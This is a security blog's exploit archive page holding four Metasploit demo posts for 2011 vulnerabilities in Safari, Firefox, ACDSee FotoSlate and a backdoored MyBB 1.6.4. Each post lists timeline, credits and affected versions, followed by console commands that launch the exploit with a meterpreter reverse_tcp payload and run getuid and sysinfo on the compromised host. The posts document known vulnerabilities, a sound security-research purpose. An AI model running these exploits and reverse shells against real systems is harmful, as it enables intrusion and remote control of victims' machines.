Category Archives: Exploits

All my posts regarding exploits, PoCs and 0days.

CVE-2011-3230 Apple Safari file:// Arbitrary Code Execution Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Aaron Sigel
Coordinated release of the vulnerability on 2011-10-12
Metasploit PoC provided on 2011-10-16

PoC provided by :

Aaron Sigel
sinn3r

Reference(s) :

CVE-2011-3230
HT5000

Affected version(s) :

Safari 5.1 for Mac OS X v10.6.8
Safari 5.1 for Mac OS X Server v10.6.8
Safari 5.1 for OS X Lion v10.7.2
Safari 5.1 for OS X Lion Server v10.7.2

Tested on Mac OS X 10.7.1 with :

Safari 5.1 (7524.48.3) and Java SE Runtime Environment (build 1.6.0_26-b03-383-11A511)

Description :

This module exploits a vulnerability found in Apple Safari on the OS X platform. A policy issue in the handling of file:// URLs may allow arbitrary remote code execution in the context of the user. In order to trigger arbitrary remote code execution, the best way seems to be opening a share on the victim machine first (this can be SMB/WebDAV/FTP, or a file format that OS X might automount), and then executing the payload from /Volumes/[share]. If there is some kind of bug that leaks the victim machine’s current username, then it is also possible to execute the payload from /Users/[username]/Downloads/, or else brute-force that information. Please note that non-Java payloads (*.sh extension) might get opened by Xcode instead of being executed; in that case please try the Java ones instead.

Commands :

use exploit/osx/browser/safari_file_policy
set SRVHOST 192.168.178.21
set URIPATH /readme.html
set TARGET 1
set PAYLOAD java/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo

Timeline :

Vulnerability discovered and reported to vendor by Chris Rohlf & Yan Ivnitskiy on 2011-06-13
Public release of the vulnerability on 2011-06-21
Metasploit PoC provided on 2011-10-12

PoC provided by :

Chris Rohlf
Yan Ivnitskiy
Matteo Memelli
dookie2000ca
sinn3r

Reference(s) :

CVE-2011-2371
EDB-ID-17974
MFSA-2011-22

Affected version(s) :

Mozilla Firefox versions before 3.6.18
Mozilla Firefox versions before 4.0.1
Thunderbird versions before 3.1.11
SeaMonkey versions before 2.2

Tested on Windows XP SP3 with :

Mozilla Firefox 3.6.16

Description :

This module exploits a vulnerability found in Mozilla Firefox 3.6. When an array object is configured with a large length value, the reduceRight() method may cause an invalid index to be used, allowing arbitrary remote code execution. Please note that the exploit requires a longer amount of time (compared to a typical browser exploit) in order to gain control of the machine.

Commands :

use exploit/windows/browser/mozilla_reduceright
set LHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo

CVE-2011-2595 ACDSee FotoSlate PLP File id Parameter Overflow Metasploit Demo

Timeline :

Vulnerability discovered by Parvez Anwar
Public release of the vulnerability on 2011-09-12
Metasploit PoC provided on 2011-10-10

PoC provided by :

Parvez Anwar
juan vazquez

Reference(s) :

CVE-2011-2595
OSVDB-75425

Affected version(s) :

ACDSee FotoSlate 4.0 Build 146 is vulnerable, other versions may also be affected.

Tested on Windows XP SP3 with :

ACDSee FotoSlate 4.0 Build 146

Description :

This module exploits a buffer overflow in ACDSee FotoSlate 4.0 Build 146 via a specially crafted id parameter in a String element. When viewing a malicious PLP file with the ACDSee FotoSlate product, a remote attacker could overflow a buffer and execute arbitrary code. This exploit has been tested on systems such as Windows XP SP3, Windows Vista, and Windows 7.

Commands :

use exploit/windows/fileformat/acdsee_fotoslate_string
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
exploit -j

getuid
sysinfo

MyBB 1.6.4 Backdoor Metasploit Demo

Timeline :

Vulnerability discovered by the vendor on 2011-10-06
Public release of the vulnerability on 2011-10-06
Metasploit PoC provided on 2011-10-08

PoC provided by :

tdz

Reference(s) :

SA46300

Affected version(s) :

Copies of MyBB 1.6.4 distributed prior to October 6th, 2011 are vulnerable.

Tested on Ubuntu 10.04.3 LTS with :

MyBB 1.6.4

Description :

MyBB is a popular open source PHP forum software. Version 1.6.4 contained an unauthorized backdoor, distributed as part of the vendor’s source package.

Commands :

use exploit/unix/webapp/mybb_backdoor
set RHOST 192.168.178.21
set VHOST blackbox.zataz.loc
set URI /mybb/index.php
set PAYLOAD php/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit

getuid
sysinfo